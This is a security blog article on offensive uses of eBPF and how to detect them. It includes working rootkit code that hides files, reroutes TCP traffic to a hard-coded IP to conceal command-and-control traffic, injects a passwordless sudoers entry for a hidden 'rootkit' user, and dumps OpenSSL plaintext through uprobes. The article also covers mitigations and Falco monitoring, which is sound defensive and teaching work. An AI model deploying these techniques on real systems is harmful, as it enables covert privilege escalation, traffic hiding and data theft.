It’s not a mystery that eBPF (Extended Berkeley Packet Filter) is a powerful technology, and given its nature, it can be used for good and bad purposes. In this article, we will explore some of the offensive capabilities that eBPF can provide to an attacker and how to defend against them.
eBPF has gained a lot of attention since its first release in 2014 into the Linux kernel (Kernel 4.4). This powerful technology allows one to run programs deep inside the Linux kernel without the need to write kernel modules or load kernel drivers. These programs are written in a restricted C-like language and compiled into bytecode that is executed by the kernel in the eBPF Virtual Machine. eBPF programs, given their nature, don’t have the usual lifecycle of a user-space process, but are rather executed when certain (programmer-specified) kernel events occur.
Those events take the name of hooks and are placed in various places in the kernel, such as network sockets, tracepoints, kprobes, uprobes, and more. They can be used for many different purposes, such as tracing, networking, and security.
In fact, in the many different security monitoring tools that exist today, Falco being one of them, eBPF can be used to monitor the system for malicious activity, performance analysis, and also enforce security policies.
Probes everywhere – eBPF hooks
eBPF programs can be attached to many different hooks inside the kernel, and the list is growing with every new kernel release. These hooks are called probes and they are placed in various places in the kernel. Here, we’ll expand upon a few of them.
- Kprobes – Kernel probes are used to instrument kernel functions. They are placed at the beginning or at the end of a function (Kretprobe) and they can be used to trace the execution of a function, to modify the arguments passed to the function, or to skip the execution of the function entirely.
- Uprobes – User probes are used to instrument user-space functions. They can be placed inside a function or any given address (Uretprobe exists too). They are different from Kprobes in the sense that they are used to instrument user-space.
- Tracepoints – Tracepoints are static markers placed at various points throughout the kernel. They are used to trace the execution of the kernel. The main difference with kprobes is that they are codified by the kernel developers when they implement changes in the kernel.
- TC or Traffic Control – Used to monitor and control the network traffic, they are similar to eXpress Data Path (XDP) programs, but they are executed after the packet has been processed by the kernel. They can be used to modify the packet or to drop it entirely.
- XPD or eXpress Data Path – Like traffic control hooks, they are used to monitor network packets, are way faster than TC hooks because they are executed before the packet is processed by the kernel, and they can be used to entirely modify the packet.
With this many hooks available, eBPF programs can be used to monitor and modify the execution of the kernel. This is why eBPF is so powerful, and also why it can be used for bad purposes too.
eBPF programs
eBPF programs are compiled into bytecode that is executed by the kernel. The eBPF programs are loaded into the kernel using the bpf()
syscall – the syscall signature looks like this:
int bpf(int cmd, union bpf_attr *attr, unsigned int size);
Code language: Perl (perl)
The cmd
parameter is used to specify the operation to perform, the attr
parameter is used to pass the arguments to the syscall, and the size
parameter is used to specify the size of the attr
parameter.
There are many different possible commands, some of them are:
enum bpf_cmd {
BPF_MAP_CREATE, /* create map */
BPF_MAP_LOOKUP_ELEM, /* lookup element in map */
BPF_MAP_UPDATE_ELEM, /* update element in map */
BPF_MAP_DELETE_ELEM, /* delete element in map */
BPF_MAP_GET_NEXT_KEY, /* get next key in map */
BPF_PROG_LOAD, /* load BPF program */
...
...
};
Code language: Perl (perl)
Right now, we are interested in the BPF_PROG_LOAD
command. This command is used to load an eBPF program into the kernel, and the attr
parameter will specify the type of the program to load, the bytecode, the size of the bytecode, and other parameters. The bpf()
syscall will return a file descriptor related to the program being loaded. This file descriptor can be used to attach the program to a hook, or to unload the program from the kernel. The program will remain in the kernel memory until the file descriptor is closed.
Fortunately for us, we don’t have to directly call the bpf()
syscall in order to create eBPF programs. There are many different libraries that can be used to create eBPF programs, some of them are:
We will use libbpfgo
in this article, but the concepts are the same for all the libraries.
Kernel-mode to user-mode communication and vice-versa
eBPF programs are executed in the kernel, but they can communicate with user-space programs and vice-versa. This is done using special objects called maps. Maps are key-value stores that can be used to exchange data between the kernel and user-space. They are created using the BPF_MAP_CREATE
command, and they can be of different types. Some of them are:
- BPF_MAP_TYPE_ARRAY – an array of elements, each element can be accessed using an index.
- BPF_MAP_TYPE_HASH – a hash table, each element can be accessed using a key.
- BPF_MAP_TYPE_PERCPU_ARRAY – an array of elements, each element can be accessed using an index, but uses a different memory region per CPU.
- BPF_MAP_TYPE_PERCPU_HASH – a hash table, each element can be accessed using a key, but uses a different memory region per CPU.
- BPF_MAP_TYPE_STACK – a stack of elements, each element can be accessed using an index, the elements are stored in a LIFO fashion.
- BPF_MAP_TYPE_QUEUE – a queue of elements, each element can be accessed using an index, the elements are stored in a FIFO fashion.
- BPF_MAP_TYPE_PERF_EVENT_ARRAY – a special map used to send events to user-space.
For our purpose, we will use a BPF_MAP_TYPE_HASH
to share some structs between the user-space and the kernel and a BPF_MAP_TYPE_PERF_EVENT_ARRAY
to send events to user-space.
eBPF programs format
As we said before, eBPF programs are written in a restricted C-like language which is then translated into bytecode. The eBPF virtual machine is a 64-bit RISC machine, and it has 11 registers and a fixed size (512 bytes) stack. The registers are:
- r0 – stores return values, both for function calls and the current program exit code.
- r1–r5 – used as function call arguments, upon program start r1 contains the “context” argument pointer.
- r6–r9 – these get preserved between kernel function calls.
- r10 – stack pointer.
Nonetheless, the eBPF virtual machine can also use 32-bit addressing if the most significant bit of the register is zeroed.
This source-to-bytecode translation is handled by clang
which can easily target the eBPF virtual architecture. In order to compile a C program into eBPF bytecode, we can use the following command:
clang -target bpf -c program.c -o program.o
Code language: Perl (perl)
This will compile the program.c
file into program.o
which is the bytecode file. This file can then be relocated and loaded into the kernel using the libraries we mentioned before.
JIT compilation, Verifier, and ALU sanitization
Due to its performance-critical nature, eBPF programs are compiled from VM Bytecode into native machine code by the kernel. This is called JIT or Just In Time compilation, and is done only once (when the program is loaded). Unless the kernel is compiled with CONFIG_BPF_JIT_ALWAYS_ON=false
, the compiled program is then stored in the kernel memory and is executed every time the hook is triggered.
Executing untrusted code inside the kernel may be a really dangerous thing, and this is why the kernel developers implemented a verifier that checks the bytecode before compiling it, this verifier checks that the program is safe to execute, and it also checks that the program is not too complex. This is done to avoid denial of services (DoS) attacks. The verifier is also used to check that the program is not trying to access memory outside the stack, or that it is not trying to access memory that is not mapped. This is done to avoid memory corruption attacks (ALU sanitization).
This safety is achieved by emulating the sequence of instructions and checking that the registers are used correctly. Below are some of the checks performed by the verifier, to name a few:
- Pointer bounds checking
- Verifying that the stack’s reads are preceded by stack writes
- Preventing the use of unbounded loops
- Register value tracking
- Branch pruning
- And many more…
More information about the verifier can be found here.
eBPF offensive capabilities
Given the knowledge we have so far, we can start to think about some offensive capabilities that eBPF programs can provide. Below are some of them:
- Abusing direct map access – eBPF programs can access maps directly, meaning that if we have access to a map file descriptor, we can modify the logic of the program.
- Abusing Kprobes – eBPF programs use carefully crafted Kprobes to hook into kernel functions, so we can modify the behavior of the kernel like hiding processes or files.
- Abusing TC hook – eBPF programs can be attached to the TC hook, meaning that we can use eBPF programs to modify the traffic of a specific interface even hiding malicious traffic.
- Abusing Uprobes – eBPF programs can use Uprobes to hook into user-space functions, meaning that we can modify the behavior of user-space programs.
Following, we will see some examples of these capabilities.
Abusing direct map access
Due to their nature, maps are a great target for attackers since writing to a map could modify the logic of the underlying eBPF program. Assume we are analyzing a firewall implementation entirely done with eBPF. The user-space component could talk over maps to the kernel to update the list of firewall rules. In order to do this, we would need access to that map file description. That’s actually possible thanks to BPF_MAP_GET_NEXT_ID
, BPF_MAP_GET_NEXT_KEY
and BPF_MAP_LOOKUP_ELEM
commands. Root permission is needed.
First of all, we need to start looping through all the available maps. This can be done using the BPF_MAP_GET_NEXT_ID
command, which will return the next available map id. We can use this command to loop through all the available maps. The following code shows how to do this:
static int bpf_obj_get_next_id(__u32 start_id, __u32 *next_id)
{
const size_t attr_sz = offsetofend(union bpf_attr, open_flags);
union bpf_attr attr;
int err;
memset(&attr, 0, attr_sz);
attr.start_id = start_id;
err = sys_bpf(BPF_MAP_GET_NEXT_ID, &attr, attr_sz);
if (!err)
*next_id = attr.next_id;
return err;
}
Code language: Perl (perl)
To loop through all the available maps, we can do something like this:
while (bpf_obj_get_next_id(next_id, &next_id) == 0) {
// do something with the id
}
Code language: Perl (perl)
Once we have the map id, we can use the BPF_MAP_GET_FD_BY_ID
command to get the file descriptor of the map. This can be done in the following way:
int bpf_map_get_fd_by_id_opts(uint32_t id, const struct bpf_get_fd_by_id_opts *opts)
{
const size_t attr_sz = offsetofend(union bpf_attr, open_flags);
union bpf_attr attr;
int fd;
if (!OPTS_VALID(opts, bpf_get_fd_by_id_opts))
return libbpf_err(-EINVAL);
memset(&attr, 0, attr_sz);
attr.map_id = id;
attr.open_flags = OPTS_GET(opts, open_flags, 0);
fd = sys_bpf_fd(BPF_MAP_GET_FD_BY_ID, &attr, attr_sz);
return libbpf_err_errno(fd);
}
Code language: Perl (perl)
Then we can retrieve the map file descriptor:
int fd = bpf_map_get_fd_by_id(next_id);
Code language: Perl (perl)
Once we have the file descriptor, we can get the map type and the map name using the BPF_OBJ_GET_INFO_BY_FD
command:
int bpf_obj_get_info_by_fd(int bpf_fd, void *info, __u32 *info_len)
{
const size_t attr_sz = offsetofend(union bpf_attr, info);
union bpf_attr attr;
int err;
memset(&attr, 0, attr_sz);
attr.info.bpf_fd = bpf_fd;
attr.info.info_len = *info_len;
attr.info.info = ptr_to_u64(info);
err = sys_bpf(BPF_OBJ_GET_INFO_BY_FD, &attr, attr_sz);
if (!err)
*info_len = attr.info.info_len;
return libbpf_err_errno(err);
}
Code language: Perl (perl)
Then we can retrieve the map type and the map name:
struct bpf_map_info info = {};
__u32 info_len = sizeof(info);
int ret = bpf_obj_get_info_by_fd(fd, &info, &info_len);
Code language: Perl (perl)
The struct bpf_map_info
contains the map type and the map name. We can read them this way:
printf("map name: %s\n", info.name);
printf("map type: %d\n", info.type);
Code language: Perl (perl)
This is actually really useful if we want to filter the maps by name or by type:
if (!strcmp(info.name, "firewall") || info.type != BPF_MAP_TYPE_HASH) {
// do something
}
Code language: Perl (perl)
Once we have all the needed information, we can start to interact with the map. For example, we can retrieve all the keys of the map using the BPF_MAP_GET_NEXT_KEY
command:
int bpf_map_get_next_key(int fd, const void *key, void *next_key)
{
const size_t attr_sz = offsetofend(union bpf_attr, next_key);
union bpf_attr attr;
int ret;
memset(&attr, 0, attr_sz);
attr.map_fd = fd;
attr.key = ptr_to_u64(key);
attr.next_key = ptr_to_u64(next_key);
ret = sys_bpf(BPF_MAP_GET_NEXT_KEY, &attr, attr_sz);
return libbpf_err_errno(ret);
}
Code language: Perl (perl)
And then we can look up the keys:
unsigned int key = -1;
unsigned int next_key = -1;
while (bpf_map_get_next_key(fd, key, next_key) == 0) {
// do something with the key
}
Code language: Perl (perl)
With the BPF_MAP_LOOKUP_ELEM
command, we can look up the value of a given key:
int bpf_map_lookup_elem(int fd, const void *key, void *value)
{
const size_t attr_sz = offsetofend(union bpf_attr, flags);
union bpf_attr attr;
int ret;
memset(&attr, 0, attr_sz);
attr.map_fd = fd;
attr.key = ptr_to_u64(key);
attr.value = ptr_to_u64(value);
ret = sys_bpf(BPF_MAP_LOOKUP_ELEM, &attr, attr_sz);
return libbpf_err_errno(ret);
}
Code language: Perl (perl)
The final code will look like this:
int main(int argc, char **argv)
{
unsigned int next_id = 0;
while (bpf_obj_get_next_id(next_id, &next_id, BPF_MAP_GET_NEXT_ID) == 0)
{
int fd = bpf_map_get_fd_by_id(next_id);
if (fd < 0)
{
printf("bpf_map_get_fd_by_id failed: %d (%d)\n", fd, errno);
return 1;
}
struct bpf_map_info info = {};
__u32 info_len = sizeof(info);
int ret = bpf_obj_get_info_by_fd(fd, &info, &info_len);
if (ret < 0)
{
printf("bpf_obj_get_info_by_fd failed: %d (%d)\n", ret, errno);
return 1;
}
printf("map fd: %d\n", fd);
printf("map name: %s\n", info.name);
printf("map type: %s\n", bpf_map_type_to_string(info.type));
printf("map key size: %d\n", info.key_size);
printf("map value size: %d\n", info.value_size);
printf("map max entries: %d\n", info.max_entries);
printf("map flags: %d\n", info.map_flags);
printf("map id: %d\n", info.id);
unsigned int next_key = 0;
printf("keys:\n");
while (bpf_map_get_next_key(fd, &next_key, &next_key) == 0)
{
void *value = malloc(info.value_size);
ret = bpf_map_lookup_elem(fd, &next_key, value);
if (ret == 0)
{
printf(" - %d\n", next_key);
map_hexdump(value, info.value_size);
printf("\n");
}
}
printf("------------------------\n");
}
return 0;
}
Code language: Perl (perl)
Once we have access to the file descriptor, it’s just a matter of reversing the map content and interpreting it. This would allow an attacker to modify the map content and change the behavior of the eBPF program (e.g., bypassing security checks).
A funny attack could be abusing the BPF_MAP_FREEZE
command, as stated in the documentation:
/*
* BPF_MAP_FREEZE
* Description
* Freeze the permissions of the specified map.
*
* Write permissions may be frozen by passing zero *flags*.
* Upon success, no future syscall invocations may alter the
* map state of *map_fd*. Write operations from eBPF programs
* are still possible for a frozen map.
*
* Not supported for maps of type **BPF_MAP_TYPE_STRUCT_OPS**.
*
* Return
* Returns zero on success. On error, -1 is returned and *errno*
* is set appropriately.
*/
Code language: Perl (perl)
Doing so would prevent any future syscall to alter the map state from userspace (e.g., bypassing security checks). This means that the map content can be modified only by eBPF programs.
Hiding files with Kprobes
Hooking syscalls from the kernel itself is quite handy when it comes to hiding files, folders, or even processes from the user. The following example shows how to hide a specific file from any command that tries to read it (e.g., cat
, nano
, grep
etc.).
It works by setting a tracepoint on the sys_enter
event which gets triggered every time a syscall is invoked, then it checks if the syscall id is SYS_openat
and if the path matches the one we want to hide. If so, it overwrites the path with a null byte. This example uses maps to store both the target path and eventually the target process name and pid. This allows us to hide the file only for a specific process or for all the processes.
The first thing to do is create a new tracepoint using the BPF_PROG_TYPE_RAW_TRACEPOINT
program type. This can be done like this:
SEC("raw_tracepoint/sys_enter")
int raw_tracepoint__sys_enter(struct bpf_raw_tracepoint_args *ctx)
{
// your code here
return 0;
}
Code language: Perl (perl)
SEC
is a macro that is used to specify the section of the program. In this case, we are using the raw_tracepoint/sys_enter
section. This section will be used by libbpf to attach the program to the sys_enter
tracepoint.
The bpf_raw_tracepoint_args
struct contains the arguments passed to the tracepoint. In this case, the first argument is a pointer to the pt_regs
struct. This structure contains the registers of the current process. The second argument is the syscall id, so we want to check if the syscall id is SYS_openat
and, if so, we want to overwrite the path with a null byte.
unsigned long syscall_id = ctx->args[1];
struct pt_regs *regs;
regs = (struct pt_regs *)ctx->args[0];
if (syscall_id == SYS_openat)
{
// do something
}
Code language: Perl (perl)
In order to communicate with the running program in user-mode, we shared a struct like the following:
struct target
{
int pid;
char procname[16];
char path[256];
};
struct
{
__uint(type, BPF_MAP_TYPE_HASH);
__type(key, u32);
__type(value, struct target);
__uint(max_entries, 1);
} target SEC(".maps");
Code language: Perl (perl)
The same struct must be defined on the golang side:
type Target struct {
Pid uint32
Comm [16]byte
Path [256]byte
}
Code language: Perl (perl)
We then can update the struct from the user-space like this:
targetMap, err := bpfModule.GetMap("target")
if err != nil {
fmt.Fprintln(os.Stderr, err)
os.Exit(-1)
}
// update the map
key := uint32(0x1337)
var val Target
copy(val.Comm[:], procname)
copy(val.Path[:], filepath)
val.Pid = uint32(pid)
keyUnsafe := unsafe.Pointer(&key)
valueUnsafe := unsafe.Pointer(&val)
targetMap.Update(keyUnsafe, valueUnsafe)
Code language: Perl (perl)
In order to make everything work, we would need some utility functions since eBPF programs can’t use libc functions. The following functions are used to manipulate strings:
static __always_inline __u64
__bpf_strncmp(const void *x, const void *y, __u64 len)
{
// implement strncmp
for (int i = 0; i < len; i++)
{
if (((char *)x)[i] != ((char *)y)[i])
{
return ((char *)x)[i] - ((char *)y)[i];
}
else if (((char *)x)[i] == '\0')
{
return 0;
}
}
return 0;
}
static __always_inline __u64
__bpf_strlen(const void *x)
{
// implement strlen
__u64 len = 0;
while (((char *)x)[len] != '\0')
{
len++;
}
return len;
}
Code language: Perl (perl)
The final code will look like this:
if (syscall_id == SYS_openat)
{
struct target *tar;
u32 key = 0x1337;
tar = bpf_map_lookup_elem(&target, &key);
if (!tar)
{
return 0;
}
else
{
char pathname[256];
char *pathname_ptr = (char *)PT_REGS_PARM2_CORE(regs);
bpf_core_read_user_str(&pathname, sizeof(pathname), pathname_ptr);
char comm[16];
bpf_get_current_comm(&comm, sizeof(comm));
u32 pid = bpf_get_current_pid_tgid() >> 32;
bool match = false;
if (tar->pid != 0 && pid == tar->pid)
{
match = true;
}
if (!match && __bpf_strncmp(comm, tar->procname, sizeof(comm)) == 0)
{
if (!match && __bpf_strncmp(pathname, tar->path, sizeof(pathname)) == 0)
{
match = true;
}
}
else
{
if (!match && __bpf_strncmp(pathname, tar->path, sizeof(pathname)) == 0)
{
match = true;
}
}
if (match)
{
if (bpf_probe_write_user(pathname_ptr, "\x00", 1) != 0)
{
return 0;
}
}
}
}
Code language: Perl (perl)
Another approach to obtain the same result is by hooking SYS_getdents
and filtering the file we want to hide from the list of files returned by the syscall.
From a defensive perspective, it’s possible to detect this kind of attack by using eBPF to monitor syscalls to SYS_bpf
and check if the attacker is trying to load a program that hooks syscalls. This can be done by checking the BPF_PROG_TYPE_RAW_TRACEPOINT
inside the bpf_prog_info
struct.
Traffic redirection with TC
Another important feature of eBPF is the ability to modify incoming and outgoing traffic on the fly, which can be done using the TC hook. This hook is executed after the packet has been processed by the kernel, meaning that the packet has already been processed by the XDP hook if it was attached to the interface.
TC can be abused to hide malicious traffic and is really useful when it comes to hiding C2 traffic. The following example shows how to redirect all the traffic to a specific IP address. This way, anyone monitoring the traffic on the interface won’t be able to see the real destination of the packets.
The first thing to do is create a new TC hook like this:
SEC("tc")
int tc_prog(struct __sk_buff *skb)
{
return TC_ACT_OK;
}
Code language: Perl (perl)
The return value can be either TC_ACT_OK
or TC_ACT_SHOT
. The first one means that the packet should be processed normally, the second one means that the packet should be dropped, so pay attention to this otherwise you will end up dropping all the traffic.
The struct __sk_buff
struct contains all the information about the packet. We can use this struct to retrieve the destination IP address and modify it. The following code shows how to do this:
struct iphdr *iph = (struct iphdr *)(skb->data + sizeof(struct ethhdr));
if ((void *)(iph + 1) > skb->data_end)
{
return TC_ACT_OK;
}
if (iph->protocol == IPPROTO_TCP)
{
// get tcphdr
struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
if ((void *)(tcph + 1) > skb->data_end)
{
return TC_ACT_OK;
}
// get tcp dst addr and dst port
__u32 dst_addr = bpf_htonl(iph->daddr);
__u16 dst_port = bpf_htons(tcph->dest);
if (dst_addr == 0xDEADBEEF)
{
// check if dst port is 0x1337
if (dst_port == 0x1337)
{
// modify dest port to 1234
u16 new_dst_port = bpf_htons(1234);
bpf_skb_store_bytes(skb, sizeof(struct ethhdr) + sizeof(struct iphdr) + offsetof(struct tcphdr, dest), &new_dst_port, sizeof(new_dst_port), BPF_F_RECOMPUTE_CSUM);
// modify dest addr to 15.204.197.177
u32 new_dst_addr = bpf_htonl(0x0FC4C5B1);
bpf_skb_store_bytes(skb, sizeof(struct ethhdr) + offsetof(struct iphdr, daddr), &new_dst_addr, sizeof(new_dst_addr), BPF_F_RECOMPUTE_CSUM);
iph = (struct iphdr *)(skb->data + sizeof(struct ethhdr));
if ((void *)(iph + 1) > skb->data_end)
{
return TC_ACT_OK;
}
struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
if ((void *)(tcph + 1) > skb->data_end)
{
return TC_ACT_OK;
}
dst_port = bpf_htons(tcph->dest);
dst_addr = bpf_htonl(iph->daddr);
}
}
}
Code language: Perl (perl)
Just remember to update the checksums after modifying the packet, otherwise the packet will be dropped by the kernel.
To detect such attacks, it is sufficient to use external monitoring tools or hardware since once the packet has been processed by the kernel it’s possible to see the actual destination of the packet.
Sudoers hidden root account
Creating a hidden user is a neat feature when it comes to hiding malicious behaviors. This can be achieved by using eBPF to hook SYS_open
and SYS_read
syscalls, and then by crafting a custom entry inside /etc/sudoers file when sudo tries to read it. The code below is just an example of how such capabilities can be achieved.
In order to do so, we created three different kprobes: one on SYS_openat2,
one on SYS_read,
and one on SYS_exit
. The logic is as follows:
1 – when SYS_openat2
is called, we save the file descriptor of /etc/sudoers and the calling process pid inside a map.
2 – when SYS_read
is called, we check if the file descriptor is the one we saved before; if so, we save the destination buffer inside the map.
3 – when SYS_exit
is called, we check if the process pid is present inside our map; if so, we close the file descriptor and remove it from our map to prevent race conditions when two processes have the same fd number.
The final code looks like this:
#define USERNAME "rootkit"
#define NEW_SUDOERS "root ALL=(ALL:ALL) ALL\n" USERNAME " ALL=(ALL) NOPASSWD:ALL\n"
#define PAD_CHAR '\0' // can also be '#'
#define MAX_SUDOERS_SIZE 20000
#define true 1
#define false 0
#define bool int
SEC("kprobe/do_sys_openat2")
int kprobe__do_sys_openat2(struct pt_regs *ctx) {
struct filename *filename;
bpf_probe_read(&filename, sizeof(filename), &ctx->si);
char name[256];
bpf_probe_read_str(name, sizeof(name), &filename->name);
if (strcmp(name, "/etc/sudoers") == true) {
size_t pt = bpf_get_current_pid_tgid();
// first write fd = -1 to the map as we are currently at the start of the function
// and we don't know the value of it yet, we also don't know the destination buffer
// until kprobe/ksys_read, so set it to NULL for now
struct fd_dest fdest = { .fd = -1, .dest = NULL };
bpf_map_update_elem(&sudoers_map, &pt, &fdest, BPF_NOEXIST);
}
return 0;
}
SEC("kretprobe/do_sys_openat2")
int kretprobe__do_sys_openat2(struct pt_regs *ctx) {
struct fd_dest fdest;
size_t pt = bpf_get_current_pid_tgid();
void *val = bpf_map_lookup_elem(&sudoers_map, &pt);
if (val == NULL)
return 0;
bpf_probe_read(&fdest, sizeof(fdest), val);
// check if we already saved the fd of /etc/sudoers to the map
if (fdest.fd != -1)
return 0;
// read the rax value, which contains the fd of the opened file
bpf_probe_read(&fdest.fd, sizeof(fdest.fd), &ctx->ax);
// update fd from -1 to the actual fd
bpf_map_update_elem(&sudoers_map, &pt, &fdest, BPF_EXIST);
return 0;
}
SEC("kprobe/ksys_read")
int kprobe__ksys_read(struct pt_regs *ctx) {
int fd;
struct fd_dest fdest;
void *read_dest = NULL;
size_t pt = bpf_get_current_pid_tgid();
void *val = bpf_map_lookup_elem(&sudoers_map, &pt);
if (val == NULL)
return 0;
bpf_probe_read(&fdest, sizeof(fdest), val);
// if we still haven't hit kretprobe of do_sys_openat2
// (the fd of /etc/sudoers is not saved yet)
// also skip if the destination buffer was already saved
if (fdest.fd == -1 || fdest.dest != NULL)
return 0;
bpf_probe_read(&fd, sizeof(fd), &ctx->di);
// check if the read fd matches the fd of the /etc/sudoers file
if (fd != fdest.fd)
return 0;
// the destination buffer pointer is within rsi register
// read its value and write it to the map
bpf_probe_read(&fdest.dest, sizeof(fdest.dest), &ctx->si);
bpf_map_update_elem(&sudoers_map, &pt, &fdest, BPF_EXIST);
return 0;
}
SEC("kretprobe/ksys_read")
int kretprobe__ksys_read(struct pt_regs *ctx) {
size_t bytes_read = 0;
struct fd_dest fdest;
size_t pt = bpf_get_current_pid_tgid();
void *val = bpf_map_lookup_elem(&sudoers_map, &pt);
if (val == NULL)
return 0;
bpf_probe_read(&fdest, sizeof(fdest), val);
if (fdest.dest == NULL)
return 0;
size_t new_sudoers_len = strlen(NEW_SUDOERS);
bpf_probe_read(&bytes_read, sizeof(bytes_read), &ctx->ax);
if (bytes_read == 0 || bytes_read < new_sudoers_len)
return 0;
// write NEW_SUDOERS to the beginning of the file
bpf_probe_write_user(fdest.dest, NEW_SUDOERS, new_sudoers_len);
// pad the rest of the /etc/sudoers with PAD_CHAR
// i < MAX_SUDOERS_SIZE check is needed otherwise the verifier won't allow
// the program to load
char tmp = PAD_CHAR;
for (u32 i = new_sudoers_len; i < bytes_read && i < MAX_SUDOERS_SIZE; i++)
bpf_probe_write_user(fdest.dest + i, &tmp, sizeof(tmp));
return 0;
}
SEC("kprobe/do_exit")
int kprobe__do_exit(struct pt_regs *ctx) {
size_t pt = bpf_get_current_pid_tgid();
// if the pid_tgid is found within the map then the process that's currently
// exiting is a process that previously read /etc/sudoers, remove it from the map
if (bpf_map_lookup_elem(&sudoers_map, &pt))
bpf_map_delete_elem(&sudoers_map, &pt);
return 0;
}
Code language: Perl (perl)
The only effective way to defend against this kind of rootkit is to use eBPF to monitor SYS_bpf
syscall.
SSL plaintext dump with Uprobe
It’s not only syscalls that can be hooked, but also user space functions. This can be done by using uprobes. Uprobe hooking works under the hood by using INT3
instructions to set breakpoints on the target function. This means that the binary must be compiled with debug symbols in order to be easily hooked. When the breakpoint is hit, the kernel will invoke the eBPF program and pass the context to it. This context contains the registers and the stack of the target process. This means that the eBPF program can read and write the stack of the target process.
The example below shows how to hook the SSL_write
function from OpenSSL and dump the plaintext of the SSL connection.
SEC("uprobe/SSL_write")
int uprobe__SSL_write(struct pt_regs *ctx)
{
size_t len = (size_t)PT_REGS_PARM3(ctx);
char *buf = (char *)PT_REGS_PARM2(ctx);
// check if len is greater than 0
if (len > 0 && buf != NULL)
{
if (len > 256)
{
len = 256;
}
bpf_printk("SSL_write RSI: %p\n", buf);
ssl_result_t *res;
u32 key = 0;
res = bpf_map_lookup_elem(&ssl_results, &key);
if (!res)
{
return 0;
}
bpf_probe_read_user_str(&res->msg, len, buf);
bpf_get_current_comm(&res->comm, sizeof(res->comm));
res->pid = bpf_get_current_pid_tgid() >> 32;
bpf_perf_event_output(ctx, &ssl_events, BPF_F_CURRENT_CPU, res, sizeof(*res));
}
return 0;
}
Code language: Perl (perl)
SSL_write
has the following signature:
int SSL_write(SSL *ssl, const void *buf, int num);
Code language: Perl (perl)
RSI
register will hold the pointer to the buffer containing the data to be sent (plaintext).
Protecting against this kind of attack is trivial, since this will make changes to the .text
segment, developers could implement some kind of integrity check (CRC32) to detect if the binary has been modified.
eBPF exploitation
eBPF is the perfect target for hackers. Given the complexity of the verifier, it’s very likely in the near future that some bugs will be found and exploited.
Fuzzing is still the preferred way to find bugs in the kernel, but it’s not easy to fuzz eBPF programs. The verifier is very strict and it’s not easy to generate valid programs. Some clever approaches have been developed to overcome this problem. For example, Buzzer from Google is a fuzzer that uses logs from the verifier itself to generate valid programs, and also KCOV to trace the coverage of the generated samples.
This approach resulted in the discovery of some bugs in the verifier, CVE-2023-2163 for example. Anyway there’s still some room for improvement, like fuzzing the side effects of kernel helper functions. This could be done by better implementing the samples’ generation logic, and, given the small number of instructions supported by the eBPF VM, it’s possible to implement a fuzzer that generates valid programs by using a grammar-based approach.
Also, entirely porting the verifier to userspace could be a good idea. This will allow us to fuzz the verifier itself with the help of assertion to force it to crash when it encounters some invalid assumptions.
Mitigation
The most effective way to mitigate such attacks is to restrict usage of SYS_bpf
to the root user. This can be done by setting the kconfig knob BPF_UNPRIV_DEFAULT_OFF,
which is the default at the moment of writing.
Another option is using monitoring tools such as Falco to monitor syscall usage and detect abuse of such.
In addition to the above methods, also using bpftool could be useful to get insight about loaded bpf programs and their respective usage (Kprobe, TC, and so on).
Conclusion
eBPF is a very powerful technology that allows us to extend the kernel functionality in a safe way. It’s used in production by many companies and it’s likely that it will be used even more in the future. But also, threat actors can take advantage of this technology to hide their malicious activities, bypass security checks, and even exploit the kernel.
The best way to deal with those kinds of next-gen attacks is to fully use the power of eBPF to monitor the kernel and detect suspicious activities.
Falco provides a great example of how eBPF can be used to detect malicious activities. Also, Falco supports monitoring eBPF syscall, thus allowing it to detect eBPF exploitation attempts.
References:
- https://github.com/google/buzzer
- https://pentera.io/blog/the-good-bad-and-compromisable-aspects-of-linux-ebpf/
- https://stdnoerr.github.io/writeup/2022/08/21/eBPF-exploitation-(ft.-D-3CTF-d3bpf).html
- https://elixir.bootlin.com/linux/v6.4.3/source/kernel/bpf/verifier.c
- https://ebpf.io/https://www.collabora.com/news-and-blog/blog/2019/04/15/an-ebpf-overview-part-2-machine-and-bytecode/